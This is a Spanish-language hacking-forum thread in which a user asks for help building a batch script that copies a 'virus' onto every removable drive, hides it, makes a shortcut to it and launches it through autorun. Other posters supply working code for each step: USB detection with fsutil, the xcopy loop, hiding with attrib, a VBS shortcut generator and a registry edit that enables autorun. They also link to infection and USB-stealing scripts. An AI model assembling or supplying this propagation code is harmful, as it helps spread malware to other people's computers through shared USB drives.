Buenas tardes comunidad, tal y como dice el titulo del tema necesito un comando para copiar un ejecutable SOLO A LAS UNIDADES EXTRAIBLES.
Quizas exista alguna variable de entorno que desconozco.
Tengo este codigo pero tambien copia a unidades del disco duro y solo quiero q se copie en unidades extraibles:
@echo off
for %%unidad in (e f g h i j k l m n o p q r s t u v w x y z) do (
xcopy %userprofile%\desktop\virus.exe %unidad%: /Y
)
El virus debe estar oculto en una carpeta de la unidad extraible y debe crearse un acceso directo en el mismo.
mmn Tal vez este post te sirva:
http://foro.elhacker.net/scripting/script_batch_para_infeccion_a_traves_de_unidades_extraibles-t250133.0.html
lei el tema pero no se explica bien que hace cada linea de código ademas si hay mas de un disco extraible el archivo solo se copia a uno.
PD: La ayuda del fsutil es excasa
fsutil necesita derechos administrativos, solo es necesario el comando "fsutil fsinfo drives"; me parece mejor que hagas un "escaneo" de las unidades sin usb(por ejemplo el equipo sin usb escanea C: y D:), tambien que sepa si se ejecuta de una usb o de una unidad. :-\
Otro link con mas informacion
http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html (http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html)
@Echo OFF
REM By Elektro H@cker
:: Obtenemos las letras de unidades conectadas
For /F "tokens=* delims=Unidades:\ " %%@ in ('fsutil fsinfo drives') Do (
Call Set "Drives=%%@"
Call Set "Drives=%%DRIVES::=%%"
Call Set "Drives=%%DRIVES:\=%%"
Call :isUSB?
REM Listar
Call Echo [Unidades] %%USBs:~1%% | MORE
)
:: FIN
Echo Se han procesado todas las unidades. | MORE
Pause&Exit
REM Comprueba si la unidad es un dispositivo USB
:isUSB?
For %%X in (%DRIVES%) Do (fsutil fsinfo drivetype %%X:\ | Find /I "extra" >NUL && (Call Set "USBs=%%USBs%% %%X"))
Goto:EOF
> Buscar y Listar archivos con cierta extensión en una computadora (http://foro.elhacker.net/windows/buscar_y_listar_archivos_con_cierta_extension_en_una_computadora-t371782.0.html;msg1786139#msg1786139)
También te puede servir este script:
(http://img688.imageshack.us/img688/6033/prtscrcaptureme.jpg)
> [BATCH] [APORTE] USB MON (Roba USB) (http://foro.elhacker.net/empty-t372089.0.html)
Saludos
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 AM
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
attrib para ocultar y VBS para crear los .lnk(esta en el tutorial de vbs por nov, en esta misma sección)
El autorun.inf, lo busco mas tarde y modifico el mensaje :P (si es que alguien no lo hace antes :xD )
Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 AMAdemas me gustaria que se abra con el autorun.inf
Cita de: Segadorfelix en 26 Diciembre 2012, 05:17 AMEl autorun.inf, lo busco mas tarde
Un
autorun.inf para un pendrive es algo del pasado, obsoleto,
si van a utilizar Windows 7/8 es imposible ejecutar un autorun.inf porque Microsoft lo deshabilitó para dispositivos USB por medidas obvias de seguridad (A menos que usen un buen pendrive "camaleón" que se haga pasar por CD-ROM).
EDITO: Para WinXP no hay problema (
Siempre que el servicio de reproducción automática esté activado en el equipo)
REM Ocultar un archivo:
Copy "Archivo.ext" "...\Carpeta\"
Attrib +H "...\Carpeta\Archivo.ext"
REM Crear un acceso directo:
(
Echo: set objWSHShell = CreateObject("WScript.Shell"^)
Echo: set objFso = CreateObject("Scripting.FileSystemObject"^)
Echo+
Echo: File = objFso.GetAbsolutePathName(WScript.Arguments.Item(0^)^)
Echo: S_File = objWSHShell.ExpandEnvironmentStrings(WScript.Arguments.Item(1^)^)
Echo: S_WorkingDir = Left(File, InStrRev(File, "\"^) - 1^)
Echo+
Echo: set Shortcut = objWSHShell.CreateShortcut(S_File^)
Echo+
Echo: Shortcut.TargetPath = File
Echo: Shortcut.WorkingDirectory = S_WorkingDir
Echo: Shortcut.Save
)>"%TEMP%\Create_Shortcut.vbs"
WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.txt" "C:\Archivo.lnk"Saludos.
me sirvió ya pude ocultar mi carpeta, tengo 4 preg(disculpen mi ignorancia, estoy dando mis primeros pasos).
1) con que registro activo el servicio de reproducción automática en xp?
2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
3) podrían facilitarme un bat para la creación de accesos directos?
4) como agrego una contraseña a una carpeta o archivo
Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM1) con que registro activo el servicio de reproducción automática en xp?
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V "NoDriveTypeAutoRun" /T "REG_DWORD" /D "0x00000091" /F http://www.askvg.com/how-to-disable-autorun-functionality-in-windows-using-registry-editor/
El servicio de reproducción automática no recuerdo cual es, lo tengo capado en mi windows, búscalo en la lista de servicios de windows (Botón inicio > ejecutar > Services.smc) y luego es tán sencillo como hacer un:
SC START "Nombre del servicio"
Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
De ninguna manera, el autorun era lo único, pero como he explicado es algo obsoleto, deshabilitado en pendrives por medidas de seguridad.
PD: Si le pones ganas puedes programar una aplicación que monitorice las uniades extraíbles y ejecutar el programa deseado, pero obviamente deberás ejecutar tu aplicación programada manualmente.
Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM3) podrían facilitarme un bat para la creación de accesos directos?
Arriba te puse un archivo bat que sirve para eso.
Llámalo cono en el ejemplo:
WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.ext" "C:\Archivo.lnk"
Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 AM4) como agrego una contraseña a una carpeta o archivo
No puedes proteger con contraseña nada usando Batch, lo único que puedes hacer es una chapuza como esto > http://www.howtogeek.com/105633/how-to-create-a-password-protected-folder-without-any-extra-software/
cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:EndSaludos